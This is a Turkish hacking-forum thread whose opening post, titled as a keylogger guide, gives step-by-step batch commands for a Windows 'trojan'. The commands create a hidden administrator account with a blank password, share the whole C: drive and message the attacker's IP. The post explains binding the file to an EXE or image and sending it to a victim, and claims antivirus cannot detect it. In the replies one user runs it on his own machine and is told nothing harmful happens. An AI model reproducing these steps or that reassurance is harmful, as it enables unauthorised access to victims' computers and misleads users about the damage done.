İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Programsız / Not Defterinden Keylogger Yazma (0 Virüs)

31-01-2012 03:45
#1
yusuf4153 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
Kocaeli
Mesajlar:
86
Teşekkür (Etti):
17
Teşekkür (Aldı):
20
Konular:
12
Ticaret:
(0) %
HACKERLIGA büyük adımlar için lazım olacak sessiz kral gururla sunar.......Ewet arkadaslar, konunun basligindan da anlayabileceginiz gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan yapmayi size kisaca anlatacagim;

Trojanin ana amaci, adindan da anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir. Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir harekettir.

Piyasada bu konuda son derece fonksiyonel bircok Trojan var fakat bu trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklidirlar, Trojanlarin Special Edition olan versiyonlarinin disindaki tüm Public versiyonlari maalesef AV lerce taninmakta ve hepsinden önemlisi Firewallar tarafindan bloke edilmektedirler ve bu da kullanicilarin isini oldukca zorlastirmaktadir.

Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.

Simdi Trojanimizi hazirlamaya baslayalim;

Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

net user HACK /add

Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;

Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;

net localgroup administrators HACK /add

Böylece "HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik "HACK" hesabimiz tüm yetkilere sahip.

Simdi de kurbanimizin makinasindaki C: sürücüsünü sınırsız paylasima acacagiz. Kurbani da huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin asagidaki komutu kullanacagiz;

net share system=C: /unlimited

Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK" hesabindan baglanacagiz?

Bunun icin de kodumuza bir satirlik bir komut daha ekleyecegiz;

NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.

Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

net start Messenger

Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardisik sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.

Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.

Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.

Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir.




<<<ALINTIDIR>>>
Kullanıcı İmzası
LanedLy Prens
Konu yusuf4153 tarafından (31-01-2012 14:59 Saat 14:59 ) değiştirilmiştir.
rockfan, teknohacker, FatallShoote Teşekkür etti.

31-01-2012 07:52
#2
SaNaLBaRoN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2009
Mesajlar:
252
Teşekkür (Etti):
112
Teşekkür (Aldı):
41
Konular:
21
Ticaret:
(0) %
Elıne saglık emek vermıssın ama alıntı oldugunu belırtmemıssın.Ayrıca bu konu yonetıcılerden bırı tarafından vıdeolu bı sekılde anlatıldı.Forumu kontrol edersen gorursun.Sana tavsıyem eger bu konuyu okudunda paylastınsa,Keylogger nedır ne işe yarar?Trojan-Virüs nedir ne işe yarar guzelce bı arastır.Senın ykarda yaptıgın komut kodlarıyla pc yı paylasıma acmak baslıkta ıse keylogger yapmı yazıyor.Keylogger adı ustunde bır loggerdır.Klavye hareketlerını ızler.Ozellıklerıne gore artı yonlerıde vardır.KOnuyla keyloggerın alakası yok kardesım.
Kullanıcı İmzası
HeR SeY VaTaN iCiN
Ne MuTLu TÜRKÜM DiYeNe
21-09-2012 02:26
#3
hasan1864 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
mersin,içel
Mesajlar:
67
Teşekkür (Etti):
18
Teşekkür (Aldı):
16
Konular:
19
Ticaret:
(0) %
tamam ben bunların hepsini yaptım Internet Explorer.bat olarak kaydettim ismini ben tıkladım.kendi bilgisayarımda bişiler oldu bi zararı oluyormu ?
21-09-2012 06:34
#4
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
Ticaret:
(0) %
Alıntı:
hasan1864´isimli üyeden Alıntı Mesajı göster
tamam ben bunların hepsini yaptım Internet Explorer.bat olarak kaydettim ismini ben tıkladım.kendi bilgisayarımda bişiler oldu bi zararı oluyormu ?
korkma bişey olmaz
21-09-2012 17:18
#5
LeTTa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hawaii
Mesajlar:
1.529
Teşekkür (Etti):
93
Teşekkür (Aldı):
28
Konular:
473
Ticaret:
(0) %
kardeş biraz daha ayrın çok kısa bi şekilde anlatırsan çok sevinirim... :inv:inv
Kullanıcı İmzası
1881 - 193∞
MUSTAFA KEMAL ATATÜRK
Ey büyük Atatürk!
Açtığın yolda, gösterdiğin hedefe durmadan yürüyeceğime ant içerim!
Varlığım Türk varlığına armağan olsun!
21-09-2012 17:46
#6
LeTTa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hawaii
Mesajlar:
1.529
Teşekkür (Etti):
93
Teşekkür (Aldı):
28
Konular:
473
Ticaret:
(0) %
kardeş biraz daha ayrın çok kısa bi şekilde anlatırsan çok sevinirim... :inv:inv
Kullanıcı İmzası
1881 - 193∞
MUSTAFA KEMAL ATATÜRK
Ey büyük Atatürk!
Açtığın yolda, gösterdiğin hedefe durmadan yürüyeceğime ant içerim!
Varlığım Türk varlığına armağan olsun!
21-09-2012 19:12
#7
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
Ticaret:
(0) %
bunlarla hack yapılabilcenimi zannediyosunuz
21-09-2012 19:30
#8
Üyelik tarihi:
08/2011
Mesajlar:
1.064
Teşekkür (Etti):
29
Teşekkür (Aldı):
142
Konular:
91
Ticaret:
(0) %
teşekkürler güzel olmuş
21-09-2012 22:10
#9
kanka5885 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Sivas
Mesajlar:
194
Teşekkür (Etti):
15
Teşekkür (Aldı):
9
Konular:
41
Ticaret:
(0) %
yaf dostum bunu
Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz. nasil yapcam nere qircem anlamadım
Kullanıcı İmzası
Tesekkur etmeyi unutma
21-09-2012 22:11
#10
kanka5885 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Sivas
Mesajlar:
194
Teşekkür (Etti):
15
Teşekkür (Aldı):
9
Konular:
41
Ticaret:
(0) %
Birde buip boylemı olacak
net send 123.123.2.1 Ben senin kurbaninim Gel bana baglan
Kullanıcı İmzası
Tesekkur etmeyi unutma

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı